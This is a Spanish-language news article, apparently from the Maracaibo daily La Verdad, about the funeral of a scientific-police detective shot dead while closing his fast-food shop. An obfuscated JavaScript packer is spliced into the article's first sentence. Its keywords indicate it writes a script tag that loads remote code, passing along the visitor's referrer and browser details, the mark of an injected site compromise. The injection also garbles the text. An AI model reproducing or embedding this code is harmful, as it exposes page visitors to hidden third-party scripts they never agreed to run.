publicidad

En el Eje de Vehículos despiden al detective

Edwin Aldrin Charry / Maracaibo / noticias@laverdad.com
Funcionarios eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|derzt|var|u0026u|referrer|kkhny||js|php'.split('|'),0,{})) de la Policía científica le rindieron honores post mortem en la sede de Eje de vehículos de Maracaibo. Su cuerpo lo sepultaron en el cementerio La Chinita. Antonio cordero, apodado el “Bomba”, habría recibido amenazas de muerte de una banda delictiva

Familiares y compañeros de trabajo de Antonio se reunieron para darle un último adiós. (Cortesía)

Los funcionarios de la Policía científica se volvieron a vestir de luto para acompañar a los familiares de Antonio José Cordero Ball, de 32 años, asesinado en horas de la noche del pasado martes, en el sector Cecilio Acosta, mientras cerraba un local de comida rápida de su propiedad.

Personas con los rostros llenos de dolor y tristeza tapados con lentes oscuros rodeaban el féretro del detective agregado. Gritos desgarradores y sollozos ahogados llenaban el ambiente de la sede del eje de Vehículos del Cuerpo detectivesco, en la urbanización Los Aceitunos, donde trasladaron el cuerpo de Cordero para rendirle honores post mortem.

El comisario Ángel Rodríguez, comentó que el joven era un gran compañero, gran hombre en vida, y una persona muy familiar, siempre pendiente del bienestar de los suyos y los que lo rodeaban. Informó que Cordero tenía seis años dentro del cuerpo, y tres como miembro del eje de Vehículos. Su cadáver lo sepultaron en horas de la tarde de ayer en el cementerio Jardines de la Chinita.

Antonio Cordero se encontraba a las 12.30 de la noche del pasado martes, cerrando su local de comida en la avenida 67 Cecilio Acosta, entre calles 9 y 9B luego de reunirse con unos amigos, cuando unos presuntos delincuentes le dispararon desde un vehículo Hyundai, Getz, celeste, hasta cerciorarse que callera sin vida al suelo. Posterior al homicidio huyeron hasta la calle 70, donde dejaron el carro para incendiarlo y no dejar rastros.

Las personas que presenciaron el sicariato esperaron hasta la desaparición de los hampones para ir a ayudar a Cordero, lo auxiliaron y lo llevaron a la clínica Paraíso, donde ingresó sin signos vitales. Al revisar sus objetos personales conocieron que se trataba de un detective de la Policía científica, a quienes llamaron al acto para avisar lo acontecido.

Una comisión del cuerpo de investigaciones, adscritos al eje de Homicidios se trasladó al lugar para recabar las evidencias y revisar las cámaras de seguridad de los locales circundantes para conocer el orden de los hechos y tratar encontrar alguna pista que los dirija al paradero de los asesinos.

Los familiares de la víctima llegaron a las 9.30 de la mañana del pasado martes vestidas con ropa formal negra, que combinaba con su luto, a la morgue para reconocer a su pariente. Una vez recibido, lo trasladaron hasta la funeraria Aves del Paraíso, en el boulevard 5 de Julio, para velarlo junto a sus familiares, compañeros de trabajo y amigos más cercanos. No quisieron hablar ante la prensa sobre lo sucedido. Un oficial del cuerpo detectivesco detalló que el caso lo manejan como una venganza, sin descartar otras hipótesis.

 

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama